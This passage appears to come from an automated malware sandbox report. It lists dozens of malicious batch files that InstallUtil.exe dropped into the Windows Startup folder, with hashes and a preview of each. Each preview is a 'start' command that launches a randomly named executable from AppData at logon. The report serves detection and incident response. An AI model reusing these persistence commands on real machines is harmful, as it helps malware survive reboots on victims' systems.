                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\bzkeEcACtFKnoC1UuUSbz0OB.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moEvd4QfiLLNeBPf2fKoDASn.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.91099995702323
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5mbESiynQ2nSLAs:fE1wkn23mb9iynYAs
                                                                                                                                                                                                                                MD5:2E07C293D3B4E10C61721C91D2731FC8
                                                                                                                                                                                                                                SHA1:7E9ABBE1558A17898A5759C33CA71BA969B3757F
                                                                                                                                                                                                                                SHA-256:7520321E6A41F7E60EC061F34CF1A40DCF93076E7B0FE9742A3C8A0D1E7E48C0
                                                                                                                                                                                                                                SHA-512:BF172341C904BE2EAB791CC003EE1EC099D8AFEF22D0DFC5DEA33A42CAA9C383E3F11D8958B4FE353E7B552B7D231DA06963B943283E84AA446F3DB44A1FA9B8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\CTBhrqB7vKJROnvunuZcUFAZ.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myITKbxjJgcKNVboC3VuR9An.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5jHSTAnjKpF4mn:fE1wkn23VjKpl
                                                                                                                                                                                                                                MD5:5F6A00900CBD76C682978EDFF46CC1F1
                                                                                                                                                                                                                                SHA1:A5E2E7006A1B1E1210E51C28130B9DF475ED94F4
                                                                                                                                                                                                                                SHA-256:6D634195456B26EFE88CECD09233FF69BA5B9C7B74A3FCB23F65A33FD1DFC6C6
                                                                                                                                                                                                                                SHA-512:017F185DF774051F2685FFB50E09532DEE116BCEF373D072F43B1284B8CDF5CBC19141ED0AAF35A935702F55D173433B33AF17C58F32B90819BB8AD8841051C5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FB8WWwveYgNXuiUkbF3okOil.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nDxlT2zfYNUQnGhPw0ddY3Jk.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916657341451683
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5wo+gvNMSrELAsn:fE1wkn23wo+0NTrE0s
                                                                                                                                                                                                                                MD5:9C1BA3BB21AD12EC50B3807BE9B24760
                                                                                                                                                                                                                                SHA1:9F8A9E70B9C33EE7FE808E30806B803F59B92891
                                                                                                                                                                                                                                SHA-256:32F2C22F5B75272518BDAF3EA37C4A1E2324BEEDCEE56E4F00AC27B1D37B8969
                                                                                                                                                                                                                                SHA-512:FD3C92A3BBD93AFF65BDC8B25CFE0B34446F690580836723DC3FFB9CA3D33CFF0CC4F0C7B12E2EA4B1F2C1EF580F768FDE676A8A7811BA5C13E1A8A2B51CA564
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UMNq6JQCwcuFbKEJ00C7NaNb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHpplC9DOVhKNIOafnUoxiOu.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.043539769019267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5v66lfEtJln:fE1wkn23zlML
                                                                                                                                                                                                                                MD5:A5F2C9214063F64983F7EB1B173A0DAF
                                                                                                                                                                                                                                SHA1:F698FBDB1FA776E2E2CFAC1B637581455F005AE3
                                                                                                                                                                                                                                SHA-256:A7E85B26BAF1B5F2208A0F5E6094EC755A58B4985BB126C757D0B1F493031A10
                                                                                                                                                                                                                                SHA-512:1D1AE4AE8C76D990B1CCD259AB0F9AD62D484E8BE7FDAFE0C9D0C96D97354959939DDE56272CB1C4004C93F7CA0C1AB67E169450B5A24141181813E468F3C225
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JRoV34kN30OEKUZzqqQMQIaH.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nz2Ckg7fITBXGmFKoxjG1u00.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515983
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5nDRB2DKR9Sy4Al:fE1wkn23lB8Ul
                                                                                                                                                                                                                                MD5:FE91D1368AB7661C3AADFE27ADF8E5B6
                                                                                                                                                                                                                                SHA1:DE81290272DD342203037E4566CE07A27DBAC435
                                                                                                                                                                                                                                SHA-256:959791F47B32DD0FB4E776D3305604A3956EBE2CCA1BE192BB535BA3520BF853
                                                                                                                                                                                                                                SHA-512:E8C9EC7CB68A1DA3F5D85ADF4D73E8AAB04B9D123D522525F54FFECAFB38CD5A93B3F3A873D4ED6101365F75706C42228416F6D832CBC9C52E0B9D7CEAF235A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Bm6HEFHdCdk8uoOOXBbmJVrU.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o6vfvXn1v5ljIkA7P0OwmNPJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098062
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5OVXdvwNfJQerAsn:fE1wkn23O96Gc
                                                                                                                                                                                                                                MD5:9644EE55FAAC23F910F78E63B4972862
                                                                                                                                                                                                                                SHA1:0D30270D8BFE0F3CE8431387A9E77B647038A434
                                                                                                                                                                                                                                SHA-256:850E8DB5F1D4948E37F390A0A8DE2A71A6F4F56393D19082A18F0197DF751CB8
                                                                                                                                                                                                                                SHA-512:1C3280BAB094B0BE09BA290613D4D4B5B900BC1BA3973DB3C1B3EC212CA6077C8578C0D7BE30C32F5EC50467421DFED7760082803FF3F51B88EFBEBF9003D8B9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kp2OCJt3hMg8nOfiV855IC6b.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oOhQXmnGTZctAq7jzm8VemBz.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515984
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WYSZGd0cPhhZHL:fE1wkn23W/mhZHL
                                                                                                                                                                                                                                MD5:2A5F2556D258A184BEF609CE376EF161
                                                                                                                                                                                                                                SHA1:0A8836D9A7B0E5835AAB859A4C19DBD65603BD7E
                                                                                                                                                                                                                                SHA-256:A46700B0193B132E2FCAFEDA0F5EF2ADA92C8BBAA9B3B5927865753F35D40A16
                                                                                                                                                                                                                                SHA-512:2B531605D22CEA71DA72198AF06B5EF8B232B69C431313D38523DAF9CF977DDD6020A1FF5BE4014F08F197D90518EE4EA5862C93E322001F7BC1DB4195AF52F7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3Dkw4ZNwPrQyjD2TIlPKqqcu.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\otmHh8LJXxRmJ6wgqiU2xXNN.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.88622450855154
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CbsItSnI0dAHF:fE1wkn23CbbrL
                                                                                                                                                                                                                                MD5:2E76D9FE260E65A1047F206025D89615
                                                                                                                                                                                                                                SHA1:1CF7BD71F3D9EDBEA8DE8EF936425E01F7223DEE
                                                                                                                                                                                                                                SHA-256:69DFA04443689248C3FD49DB54AF0101F94518C3780C96AF0112E5A1C0AD1DF6
                                                                                                                                                                                                                                SHA-512:3D6591695278704EFB628C54C0923D84F40D80575A73F9F0E44FD237E1E7F695642DB608DCEA72223875D7FD5F2E5EA9079BC6B3A96DC44DA26BDFA18C2BDE5B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gYoelXOXnR67v6k5aVRTdw5t.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIWBIkjKkw1pyL67X81LlMuW.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.939985464269607
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5XNmBdsPLYiFn:fE1wkn23dmbsPLP
                                                                                                                                                                                                                                MD5:AA3FD67681EC980B4077440B365AECAC
                                                                                                                                                                                                                                SHA1:3BDD8B838364FDB0805CFF6385074FF0D33F529D
                                                                                                                                                                                                                                SHA-256:0BCA8EC60F0C617BDA0B0D4EB4283EA9A7B14C9F8934C7C6A6554BB5C7E6C354
                                                                                                                                                                                                                                SHA-512:36C92F08BE7EF4CC4B8374A4B3783B54E93B07ADF5237E4CAA886DD54D342D747EA5687C02058F7FA20A4B983656226A1CE437BF237347A0F99D6190EE8D79E2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\rpBCc3ylG3nivVIH9WHFRiU0.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pYpnQnrOSHLqZa7RxVaX3LWM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.967523645862218
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5vH8QG+lXv4As:fE1wkn230T+94v
                                                                                                                                                                                                                                MD5:D94A3CAF985FFDEA4F948C21D68271EE
                                                                                                                                                                                                                                SHA1:9148B06E0850A289F6EA8F283B52398C7846693C
                                                                                                                                                                                                                                SHA-256:FB29C7BD40789C23FA4BCD62FC97E62561E0D768CEACCB3D5ACD6A73C84FC050
                                                                                                                                                                                                                                SHA-512:A6017BC83B1A4DFDAC32DB4F0FC3D535F9C57922F0653B45895CA9D650B28450282FDDACD9BE4D19F287BB77682B3A9DBBD2705B7E384F4CFB714867A0C0A410
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Ju6O9RRnwY5cmyJE9vtS2Jgt.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q6S8ZsBC4fHsfjqey8ivFoc0.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.026941986008737
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5zZE+09xdjOhL4Al:fE1wkn231E24m
                                                                                                                                                                                                                                MD5:6C8D68086F1F472C158628D8D885BB9D
                                                                                                                                                                                                                                SHA1:AC449315694BB599EF47325FB409F91326C1E979
                                                                                                                                                                                                                                SHA-256:9D1611E2399C2ACC5F5EF376CCA4452D12E3D07E437314459EF33E47DB76DC35
                                                                                                                                                                                                                                SHA-512:3F7DF05FCAACA2067CC3F482B15E9142EDA859F8D63F061721E872A0A9EF567FAF32216F2EC81759BD53F811B3E6D2732210A3CF74DDB2F66C2C153585F4DFA2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\VMOLwRqqIQXTJzWKrLXkyRQ8.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rU6sAXL8ShxvNSFxfztITQEO.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.766446791066171
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5hBxW2L0uEAJC0FCHF:fE1wkn23XxW2ouE/N
                                                                                                                                                                                                                                MD5:559A9069C4B0A288723A0A067A1A9FE0
                                                                                                                                                                                                                                SHA1:ABE2EA38A244C08864A3EE4EFAC01ADEF8A19804
                                                                                                                                                                                                                                SHA-256:FE44790ED94424378B8FADA7E3CE1C458D2FAF59615E9BFF392C1304EAFDD221
                                                                                                                                                                                                                                SHA-512:D5F52CC034EF7CB6584EA21D6ABF4F8E98F51A333D02B2E510A08F74A344D3F6E2D0E762168A74468D8F1888A9AE51963D27AF9AD985DF09148006980AAE178E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\DdT3rCn1HYZaeiTB6islHQa6.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVcxREh2h9e98HI2JvGb21V7.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.900059558441151
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J50sXFUdXrs7X0diFn:fE1wkn230s1mw7ks
                                                                                                                                                                                                                                MD5:0EC4F43A7995DBB178925C037AA44E79
                                                                                                                                                                                                                                SHA1:3E59FF3D9AD12ADEBB89A40FDFA3272F5FE3F451
                                                                                                                                                                                                                                SHA-256:D6BD1E9185D726F126D6FC1CF471B1F2F674576D91F8970A3E26FD4982A14B4C
                                                                                                                                                                                                                                SHA-512:988DC43A2808BAC1AF454C620EF0BDB66CFBB31AD882899B749F880EAD5316457AFF64FDC94B83F8C45525C590128769907B4D7CF6DAA8A6812A55D27DFB5420
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\QIr2p18CO0NWQIPJWCtoKG30.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rbuXaEpUYfBvSLY1BSq9FAGz.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.922314725880133
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5/2CH8gUjVjs:fE1wkn239cgOs
                                                                                                                                                                                                                                MD5:6D8C5D9B665E70A0FE90FBDD95D48691
                                                                                                                                                                                                                                SHA1:B33F248C22793E66EF17FFAB108449F30DE15E74
                                                                                                                                                                                                                                SHA-256:5354D5B022D131A67AC7143810981DFEA12D0EA14D0BC6993974FF0FE0E1895E
                                                                                                                                                                                                                                SHA-512:3BAA29BC439774B6A79E57E6A9D3BFB9CE21DB18103069DAB89CAA9D59C7B5AE9C8367FF1BAB1AA72CF524F44DE424BEEA46937849A3E748884762346DD5F351
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Za9YgbYvsobCQHROGG56LpJy.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reYWUrsGfXdjd232fVT1vkBW.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.019837275926519
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5By9BWaEN8vcsYiF:fE1wkn23t8EBiF
                                                                                                                                                                                                                                MD5:6E30BE121743B691132EAB302DB20260
                                                                                                                                                                                                                                SHA1:2613CC86915E444C189F9686384D24DB9D5CBB50
                                                                                                                                                                                                                                SHA-256:04EC5831F1FF0217378D33E04766FA783B78CF21116FA912989E4318C504159C
                                                                                                                                                                                                                                SHA-512:8643CE721A6F1666BD88AC11447988B3B7914952BD3E5A88C2DFA46045BEA50A807D34D2C326A9342E2FFA39313B81B0D65604C6C56DCAE1869ED991C940FF87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\dWXd3iKvKIXWjmhGzJ9IYi7c.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rgr9vKFddOoI510FsaWGwfMd.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.03479278622115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WURkR2GqSHykdan:fE1wkn23WI1GPSD
                                                                                                                                                                                                                                MD5:5EA035B9D7A5511C1AE58A6C54332FDF
                                                                                                                                                                                                                                SHA1:D3E8D2D94B20887029CB7BCA09AFDBC5B1A0C731
                                                                                                                                                                                                                                SHA-256:6CD22C677A739EC50564C3398DA6952A44468961C72D1172C1F02D3E1D7E38D2
                                                                                                                                                                                                                                SHA-512:5D5BF0D5574F8F06B06EB4DE50F62F0A3C2A2AE973D94F7EECD3D314DF7C1252B6A1CCCD94CC731012942F4F1AED316B59206834FD72B8529F5329FCE4074F8D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rkJ56qyUQvOtS5TAPobyZHxi.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.066867891837193
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5O/HwUHCLAdAl:fE1wkn23O/HHC0dm
                                                                                                                                                                                                                                MD5:4656A53D32145984D67BF4BFD5B57F02
                                                                                                                                                                                                                                SHA1:CAFC6E26872980E6F3DA074F21E2DC77F843C66D
                                                                                                                                                                                                                                SHA-256:D0CC6F6F9BF397277E9F5A8CFB281937976B83260855209B20165CF230A399FD
                                                                                                                                                                                                                                SHA-512:5DE64495051544BBF38B5A87A00C4BC419711B67374383BB06B23B80D28B1A1C17B10EE343A433ADB9D484D01232CCC55B658F6BD702E54C9A1B8C3232972BCB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kWI9BKuDjwJM7B5NwPk2GzgD.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sEO8Bhf0d4Qrw9uimKYvdPbJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.835358204141004
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SmOc9fooxHL:fE1wkn23SM1p
                                                                                                                                                                                                                                MD5:E547A67A169F799B28CCB0812062A8B4
                                                                                                                                                                                                                                SHA1:7327002FA7F022DAA8C505585E4218FD51674383
                                                                                                                                                                                                                                SHA-256:525E37C0E19C6A38012EA719D92143AC5F28A337BBB20A1302F57D0F08739EA4
                                                                                                                                                                                                                                SHA-512:A8E2E5CB9F53234972890AFD2412BE0C55CF44F0A100AFA8B4A114A5F1CEA9181C7F31A78460E8F1F43CF1BED943E9A6609D42FBB0E69087B7D18B11C2BE5E64
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\77pRyJyaqlt2sZMToC1r94jB.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sW90HVv4foncLJ8sPYYq235r.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.915210015797916
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5NtkbHjLGOBAs:fE1wkn23/A8s
                                                                                                                                                                                                                                MD5:346EF1127D82F41ED8DC227B6127906A
                                                                                                                                                                                                                                SHA1:26906982A615F0CC254A9520CB6A5BE255CC8824
                                                                                                                                                                                                                                SHA-256:AE666819A3D5E6A676EC676BA8B63D974BB00D8F22F00ACF268037CAEF43C3BC
                                                                                                                                                                                                                                SHA-512:7810AB839DA81D7AB9BD0CB97C73E3E383E1F2219FC3FC532BE914F89FB8D9D5A0345F42A549AF2B56A33FFE08B912154CD23587987BB142B6EEF1143BF8F529
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hHAgXlOl44R75PdcNtQ5s8e3.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t848D57sRdga678o3iuE8fs0.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.795057928037724
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rVVhuGELfwmcCl:fE1wkn23ZVhu99cCl
                                                                                                                                                                                                                                MD5:81524046539FDF41CE104F4BFC4DE6B6
                                                                                                                                                                                                                                SHA1:44A67A89578BE91F413223A8BB288554A2A029A0
                                                                                                                                                                                                                                SHA-256:F6B7481B8C366CB0C3250678635550367478336076A589ED06080E743ACB2DC2
                                                                                                                                                                                                                                SHA-512:DB53B90512C6A19B3270B23887AE26E222DA427D039150429C74B80475EF355F23A75899B85484DF890ECC1274439D0EBB468DEAB027D90F09857A3C44B0710A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NRQOltVD0acQXnzUvV0AHMDa.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAqt6IonJ28ek47HWmcHedgJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098064
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5GMT8HP0sn:fE1wkn23GMqT
                                                                                                                                                                                                                                MD5:01365B8397F67D146D624CF9C4130D39
                                                                                                                                                                                                                                SHA1:58334D23FB992F7E53BC13BBE139E7A89C75BC99
                                                                                                                                                                                                                                SHA-256:A1CF256364035D20E58E28C46252AEE05759796210C36C3355669DAE2117F321
